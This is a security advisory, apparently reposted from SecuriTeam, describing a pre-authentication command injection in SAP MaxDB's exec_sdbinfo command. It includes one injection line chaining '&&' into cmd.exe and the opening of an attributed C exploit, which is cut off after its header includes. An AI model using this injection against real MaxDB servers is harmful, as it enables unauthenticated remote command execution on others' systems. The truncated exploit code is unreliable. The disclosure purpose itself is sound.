- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SAP MaxDB Pre-Auth Command Execution
------------------------------------------------------------------------
SUMMARY
<https://www.sdn.sap.com/irj/sdn/maxdb> SAP MaxDB is "a commercial and
widely known and used database". A vulnerability in MaxDB's system()
command allows remote attackers to cause the program to execute arbitrary
commands.
DETAILS
Vulnerable Systems:
* SAP MaxDB version 7.6.03 build 007 and prior
The MaxDB server executes "cons.exe DATABASE COMMAND" through system()
when some special commands are called by the user. Some of these special
commands are "show" and "exec_sdbinfo" and this last one is just one of
the small amount of commands which can be executed by the unauthenticated
users before logging in.
The usage of system() for executing the cons program allows an external
unauthenticated attacker to execute any command he wants on the target SAP
MaxDB server simply passing the "&&" or other patterns for the execution
of multiple commands in the shell.
So it's just enough to use the following SAP command to see the content of
C: on Windows (the bug is naturally exploitable on any other platform
supported by the server):
exec_sdbinfo && echo dir c:\ | cmd.exe
Then the rest and all the other possibilities of exploiting this
vulnerability are in the fantasy of the attacker...
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/sapone.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
No comments:
Post a Comment